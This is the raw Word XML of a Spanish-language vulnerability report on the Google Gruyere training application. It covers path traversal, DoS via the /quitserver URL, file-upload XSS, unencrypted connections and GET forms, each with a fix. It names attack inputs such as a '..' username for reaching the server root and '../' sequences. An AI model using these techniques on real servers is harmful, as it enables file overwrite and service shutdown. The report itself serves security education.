    <w:p w14:paraId="3A649804" w14:textId="7D55487B" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Llegamos a la que para </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>mí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es la vulnerabilidad más críticas de todo la aplicación, pues gracias a esta se pueden conseguir cosas como tener acceso al servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A6841" w14:textId="399E4993" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08795C94" w14:textId="26A8F5F7" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A683DA9" wp14:editId="71AA2060">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="384" name="Imagen 38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descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF0DE92" w14:textId="459758B6" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A331781" w14:textId="6F70B487" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Realizar ataques de DoS, subiendo archivos al servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA8791" w14:textId="61BFAE80" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119642C3" w14:textId="1933F8BD" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="0007255E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F521BC" wp14:editId="42AD9B84">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA1FB5" w14:textId="3FFF53AC" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4139BD22" w14:textId="20DE04EE" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Para más información sobre estos ataque mirar el documento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FD9A9" w14:textId="5DFDC88A" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C032D0C" w14:textId="3CC2DB5C" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En si el Path Transversal sirve para acceder </w:t>
      </w:r>
      <w:r w:rsidR="00220A65">
        <w:t>a archivos fuera el directorio, como en este ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E40ADD" w14:textId="688177F4" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E3CA45" w14:textId="4026A751" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00E87F49">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28795455" wp14:editId="00F9A800">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EDA9D7" w14:textId="299967A9" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2A8DF7" w14:textId="007F2539" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>También podré mostrar los usuarios del sistema, en el que está instalada la aplicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B91FC" w14:textId="62CC43B7" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514EB525" w14:textId="6629CB43" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C67B42F" wp14:editId="18D89495">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="387" name="Imagen 38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n 287" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00C65E" w14:textId="47C6FA76" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37835370" w14:textId="33D22DD2" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pero el mayor problema ocurre al crear un usuario, poniendo .. de nombre, conseguirnos cambiar la carpeta del usuario al directorio raíz </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> servidor, con esto combinado con la vulnerabilidad File Upload, podremos sobre escribir los ficheros de la propia aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C3038" w14:textId="28C3A0A6" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F6C8D5" w14:textId="7A948305" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Para corregir esto deberíamos primero impedir que se pueda crear un usuario que use caracteres en su nombre, como explico en el documento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E73524D" w14:textId="354125A5" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD2B896" w14:textId="77777777" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00220A65">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="357"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminar “..” y “../” de cualquier entrada a la que se pude meter un archivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFFFE1B" w14:textId="55DA8863" w:rsidR="00220A65" w:rsidRDefault="00220A65" w:rsidP="00220A65">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Asegúrate de que el servidor web este configurado correctamente para permitir el acceso público solo a aquellos directorios que se necesitan para que el sitio funcione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF334E" w14:textId="4B4FFC0B" w:rsidR="00D2058E" w:rsidRDefault="00D2058E" w:rsidP="00220A65">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF3D4DC" w14:textId="0439DD8F" w:rsidR="00D2058E" w:rsidRDefault="00D2058E" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF55E23" w14:textId="206A38B9" w:rsidR="00D2058E" w:rsidRDefault="00D2058E" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292A9442" w14:textId="61866BEF" w:rsidR="00BC7AC0" w:rsidRDefault="00BC7AC0" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE7A65B" w14:textId="63DEEDE1" w:rsidR="00BC7AC0" w:rsidRDefault="00BC7AC0" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc128034202"/>
      <w:r>
        <w:t>DoS-&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="3DF20E45" w14:textId="29940787" w:rsidR="00BC7AC0" w:rsidRDefault="00BC7AC0" w:rsidP="00BC7AC0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Enlace</w:t>
      </w:r>
      <w:r w:rsidR="0084360E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId354" w:history="1">
        <w:r w:rsidR="0084360E" w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/Denial_of_Service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0084360E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409ADD89" w14:textId="4A450D43" w:rsidR="0084360E" w:rsidRPr="00956833" w:rsidRDefault="0084360E" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBBC898" w14:textId="77777777" w:rsidR="00956833" w:rsidRPr="00956833" w:rsidRDefault="00956833" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00956833">
        <w:t>Un ataque de Denegación de Servicio (DoS, por sus siglas en inglés) es un tipo de ataque informático que tiene como objetivo interrumpir o dificultar el acceso a un servicio en línea o recurso de red, haciendo que se vuelva inaccesible para los usuarios legítimos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B624E" w14:textId="79CF431D" w:rsidR="00956833" w:rsidRDefault="00956833" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00956833">
        <w:t>En un ataque de DoS, el atacante utiliza una variedad de técnicas para inundar el servidor o la red con una cantidad abrumadora de tráfico, solicitudes, paquetes o conexiones, lo que hace que el sistema se vuelva lento o se bloquee por completo. Esto puede hacer que los usuarios legítimos no puedan acceder a los recursos o servicios que están tratando de utilizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EA51A" w14:textId="272089C6" w:rsidR="00956833" w:rsidRDefault="00956833" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265234AB" w14:textId="75B5B5A3" w:rsidR="00956833" w:rsidRDefault="00956833" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>En el caso de Google gruyere</w:t>
      </w:r>
      <w:r w:rsidR="00347913">
        <w:t>, podremos acceder a URL que no deberíamos, como /quitserver y cerrar el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57062580" w14:textId="77777777" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD8515B" w14:textId="21D97FEF" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40AA5DD7" wp14:editId="4FE3EADB">
            <wp:extent cx="5400040" cy="2902585"/>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00040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DC4E6" w14:textId="1B477390" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F292425" w14:textId="20E3D6F9" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso podremos ir a gruyere.py y añadir a la lista de URL protegidas esta para que eso no pase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBACBF9" w14:textId="1C2FEE2B" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D0B1DF" w14:textId="7C36C711" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>También podremos modificar un archivo de gruyere mediante Path Transversal, y con eso hacer caer el servicio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FCFE2" w14:textId="6877D642" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00417B66">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B17C7D6" wp14:editId="0917933A">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58639909" w14:textId="7FF2E028" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00956833">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0639FA67" w14:textId="5F53D73B" w:rsidR="00347913" w:rsidRDefault="00347913" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Para corregir esto deberíamos aplicar las técnicas ya descritas, como impedir que se suban todo tipo de ficheros al servidor, impedir que se puedan usar ../,..,/../, en donde se puedan subir ficheros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74CB00" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFB4298" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRPr="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00CB5348">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc128034203"/>
      <w:r w:rsidRPr="00CB5348">
        <w:t>File Upload -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="2153A1CA" w14:textId="77777777" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6B17B1" w14:textId="519C8D4D" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId355" w:anchor=":~:text=%C2%BFQu%C3%A9%20es%20la%20Vulnerabilidad%20de,%2C%20tipo%2C%20contenido%20o%20tama%C3%B1o" w:history="1">
        <w:r w:rsidRPr="00AC20CB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.north-networks.com/que-es-la-vulnerabilidad-file- upload/#:~:text=%C2%BFQu%C3%A9%20es%20la%20Vulnerabilidad%20de,%2C%20tipo%2C%20contenido%20o%20tama%C3%B1o</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DE595B1" w14:textId="6BAC9585" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F0F0A6" w14:textId="744CE858" w:rsidR="00CB5348" w:rsidRDefault="00CB5348" w:rsidP="00F5671C">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB66C55" w14:textId="046C935B" w:rsidR="00877785" w:rsidRDefault="00CB5348" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En el caso de esta vulnerabilidad, la trataba como File Upload XSS, porque realmente la aplicación en si no permite ejecutar por ejemplo ficheros PHP, o Python, por lo tanto lo único que ejecuta son archivos HTML que pueden contener JavaScript, por eso catalogar esta vulnerabilidad como File Upload XSS, es cierto que se puede explotar más esta vulnerabilidad y que haga más cosas, pero como para eso necesito usar esta vulnerabilidad en conjunto con otras vulnerabilidad</w:t>
      </w:r>
      <w:r w:rsidR="00877785">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="006217A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545DAB53" w14:textId="48E37C5A" w:rsidR="00B218F1" w:rsidRDefault="00B218F1" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Estos ataques son de los que hablaré en el apartado posterior, donde consigo un control sobre la máquina en donde se encuentra el servidor y el control del navegador del cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E1636" w14:textId="2C9D86ED" w:rsidR="006217A4" w:rsidRDefault="006217A4" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Entonces ya n</w:t>
      </w:r>
      <w:r w:rsidR="00B218F1">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> estaríamos halando de la vulnerabilidad en sí, si no de un conjunto de  varias</w:t>
      </w:r>
      <w:r w:rsidR="00B218F1">
        <w:t xml:space="preserve"> vulnerabilidades que funcionando juntas consiguen hacer un daño</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB8694" w14:textId="40A61420" w:rsidR="006217A4" w:rsidRDefault="006217A4" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>La vulnerabilidad de File Upload (subida de archivos) se refiere a una situación en la que un usuario malintencionado puede aprovechar una aplicación web que permita la carga de archivos para realizar acciones no autorizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EF9B9" w14:textId="4198DB65" w:rsidR="006217A4" w:rsidRDefault="006217A4" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Esto puede suceder si la aplicación web no valida adecuadamente los archivos que se cargan y se imponen restricciones adecuadas a ellos</w:t>
      </w:r>
      <w:r w:rsidR="00BD4035">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20258C35" w14:textId="77777777" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00877785">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E78210D" w14:textId="77777777" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t>Conexión no encriptada -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474589B" w14:textId="77777777" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71"/>
    <w:p w14:paraId="27D000FD" w14:textId="77777777" w:rsidR="00725D71" w:rsidRPr="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00725D71">
        <w:t>La vulnerabilidad de conexión no encriptada se refiere a una situación en la que la comunicación entre dos dispositivos o sistemas se realiza sin ningún tipo de cifrado o protección. Esto significa que cualquier persona o entidad que tenga acceso a la misma red o línea de comunicación puede ver la información que se está transmitiendo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2AB8B" w14:textId="77777777" w:rsidR="00725D71" w:rsidRPr="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00725D71">
        <w:t>Por ejemplo, si un sitio web no utiliza una conexión encriptada (HTTPS) para transmitir información entre el servidor y el navegador del usuario, cualquier persona que tenga acceso a la misma red (como un punto de acceso WiFi público) podría interceptar y ver esa información. Esto podría incluir información confidencial como contraseñas, detalles de tarjetas de crédito, y otros datos personales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BF831" w14:textId="77777777" w:rsidR="00725D71" w:rsidRPr="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00725D71">
        <w:t>La falta de encriptación también puede permitir que un atacante manipule o modifique la información que se está transmitiendo, lo que puede llevar a resultados peligrosos o inesperados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD6404" w14:textId="46EEB0E2" w:rsidR="00725D71" w:rsidRDefault="00725D71" w:rsidP="00725D71">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00725D71">
        <w:t>Para protegerse contra esta vulnerabilidad, es importante utilizar conexiones encriptadas siempre que sea posible, especialmente al transmitir información confidencial. Esto puede incluir el uso de HTTPS en sitios web, la configuración de una red privada virtual (VPN) para comunicaciones en línea, y la utilización de programas y aplicaciones que cifran la información antes de enviarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E049967" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00725D71">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31088E68" w14:textId="02437648" w:rsidR="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t>Envió de formularios por el método GET -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D56C2" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRPr="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D"/>
    <w:p w14:paraId="6F88826D" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRPr="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00821D5D">
        <w:lastRenderedPageBreak/>
        <w:t>La vulnerabilidad de envío de formularios por el método GET se refiere a una situación en la que los datos de un formulario se envían a través de una URL no encriptada utilizando el método HTTP GET. Esto significa que los datos del formulario se incluyen en la URL como parámetros, y pueden ser vistos por cualquier persona que tenga acceso a la misma red o línea de comunicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63008948" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRPr="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00821D5D">
        <w:t>Por ejemplo, si un usuario completa un formulario en un sitio web que utiliza el método GET para enviar los datos del formulario, cualquier persona que esté monitoreando la red podría ver la URL y los parámetros enviados. Esto podría incluir información confidencial como contraseñas, detalles de tarjetas de crédito, y otros datos personales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F6866" w14:textId="77777777" w:rsidR="00821D5D" w:rsidRPr="00821D5D" w:rsidRDefault="00821D5D" w:rsidP="00821D5D">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00821D5D">
        <w:t>Además, la vulnerabilidad de envío de formularios por el método GET también puede permitir que un atacante manipule o modifique los datos del formulario antes de que se envíen al servidor.</w:t>
      </w:r>
    </w:p>
